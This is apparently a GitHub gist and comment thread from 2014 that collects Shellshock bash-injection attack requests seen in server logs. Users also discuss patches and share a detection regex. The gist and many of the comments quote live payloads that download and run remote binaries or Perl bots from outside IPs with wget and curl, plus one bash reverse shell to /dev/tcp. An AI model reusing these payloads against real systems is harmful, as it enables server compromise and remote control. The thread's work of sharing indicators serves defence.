-
-
Save anonymous/929d622f3b36b00c0be1 to your computer and use it in GitHub Desktop.
| GET./.HTTP/1.0 | |
| .User-Agent:.Thanks-Rob | |
| .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
| .Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
| .Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
| .Accept:.*/* | |
| $ file nginx | |
| nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped | |
| $ md5sum nginx | |
| 5924bcc045bb7039f55c6ce29234e29a nginx | |
| $ sha256sum nginx | |
| 73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx | |
| Looking at string variables, it appears to be a kernel exploit with a CnC component. | |
| - found by @yinettesys |
Can anyone else confirm if this is a suitable intermediary fix whilst we wait for a more permanent fix?
On OS X, I applied all the patches (http://ftp.gnu.org/gnu/bash/bash-4.3-patches/) and rebuilt bash 4.3 from source after making this change manually to variables.c and it appears to be working. Not able to reproduce the Bash bug vulnerability as such...
Somebody did this that supposedly works for both Mac / OSX and (all?) Linux variants, but test it yourself and have a go: https://shellshocker.net/
Same here, got different requests since yesterday morning: `[26/Sep/2014:09:10:11 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 401 652 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""``
198.101.206.138 also here:
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1052 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
213.5.67.223 - - [25/Sep/2014:15:46:35 +0200]
...and this one:
"GET /cgi-bin/his HTTP/1.0" 404 1044 "-" "() { :;}; /bin/bash -c "cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""
A n00b question here:
If the logs show up as 404'd does it mean the UserAgent env were not actually evaluated - i.e. exploit failed ?
@Cherrytreee do you have cgi scripts? If not then you're safe atm.
@ChrisMCMine I don't. Thx!
More in the wild, though it looks like one of those "Is your site affected?" website scanners like shellshocker.net (if not for the remote file fetching). In this case, I wonder if it's necessarily a good idea for people to be creating "Check your website" online testers since it provides a proxy option for people with more malicious intent.
IP Address: 74.201.85.67
Location: Atlanta, GA 30303
http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/info.sh
http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/php.fcgi
http://target.tld:80/cgi-bin/php
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
Timestamp: 9/26/2014 8:39:45 AM
@UAHR
[25/Sep/2014:11:10:43 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 403 296 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
snap!
I created a regex that matches the different attacks. (egrep compatible v4)
()\s{.;\s}\s*;
Examples:
http://rubular.com/r/FRoObXn9Kx
just discovered a new one in our server logs..
X.X.X.X - - [27/Sep/2014:06:18:02 +0200] "GET /de HTTP/1.0" 200 36399 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://customer-domain-censored.com/\x22""
"() { :;}; /bin/bash -c "wget --delete-after http://remika.ru/userfiles/file/test.php\"
艹
Found this: "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
and another one bites the dust..
62.210.75.170 - - [30/Sep/2014:00:13:28 +0200] "GET /de/cgi-mod/index.cgi HTTP/1.1" 404 315 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'"
Great,
86.34.164.238 - - [28/Sep/2014:13:01:55 +0800] "GET / HTTP/1.0" 200 364 "-" "() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh""
Seems fairly straight-forward.
omg
it work on android?
thats fine
it work on android?